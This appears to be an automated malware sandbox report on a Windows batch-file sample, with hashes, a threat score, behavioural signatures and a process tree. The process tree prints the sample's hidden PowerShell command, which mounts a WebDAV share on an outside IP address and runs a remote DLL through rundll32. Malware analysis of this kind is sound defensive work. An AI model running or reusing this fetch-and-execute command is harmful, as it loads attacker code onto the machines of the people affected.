Analysis
-
max time kernel
122s -
max time network
125s -
platform
windows7_x64 -
resource
win7-20240705-en -
resource tags
arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system -
submitted
14/07/2024, 17:15
Static task
static1
Behavioral task
behavioral1
Sample
1636923356216104319.bat
Resource
win7-20240705-en
7 signatures
150 seconds
Behavioral task
behavioral2
Sample
1636923356216104319.bat
Resource
win10v2004-20240709-en
8 signatures
150 seconds
General
-
Target
1636923356216104319.bat
-
Size
2KB
-
MD5
671835b5ba85f58fa48233a3a78e2b60
-
SHA1
e827dae662a688fef5c161af5b6cf1bb71840736
-
SHA256
9bbfb551bbc989aa9b84eb4a3618376d3a98915ae6df5f6022695c7f5cd59786
-
SHA512
0e1c5e3917b0bc6863fa12d462777f1404afcd3855e95c968e11676238421e33cbc6cabbe884441781ce229a151bcc25a248a64a176315d07ea402bf98edc7c7
Score
8/10
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2344 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2344 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2344 powershell.exe -
Suspicious use of SetWindowsHookEx 5 IoCs
pid Process 2944 wordpad.exe 2944 wordpad.exe 2944 wordpad.exe 2944 wordpad.exe 2944 wordpad.exe -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 2096 wrote to memory of 2944 2096 cmd.exe 32 PID 2096 wrote to memory of 2944 2096 cmd.exe 32 PID 2096 wrote to memory of 2944 2096 cmd.exe 32 PID 2096 wrote to memory of 2344 2096 cmd.exe 33 PID 2096 wrote to memory of 2344 2096 cmd.exe 33 PID 2096 wrote to memory of 2344 2096 cmd.exe 33 PID 2344 wrote to memory of 3004 2344 powershell.exe 35 PID 2344 wrote to memory of 3004 2344 powershell.exe 35 PID 2344 wrote to memory of 3004 2344 powershell.exe 35 PID 2344 wrote to memory of 2908 2344 powershell.exe 36 PID 2344 wrote to memory of 2908 2344 powershell.exe 36 PID 2344 wrote to memory of 2908 2344 powershell.exe 36
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\1636923356216104319.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2096 -
C:\Program Files\Windows NT\Accessories\wordpad.exe"C:\Program Files\Windows NT\Accessories\wordpad.exe"2⤵
- Suspicious use of SetWindowsHookEx
PID:2944
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -windowstyle hidden net use \\45.9.74.32@8888\davwwwroot\ ; rundll32 \\45.9.74.32@8888\davwwwroot\4571.dll,entry2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2344 -
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" use \\45.9.74.32@8888\davwwwroot\3⤵PID:3004
-
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" \\45.9.74.32@8888\davwwwroot\4571.dll entry3⤵PID:2908
-
-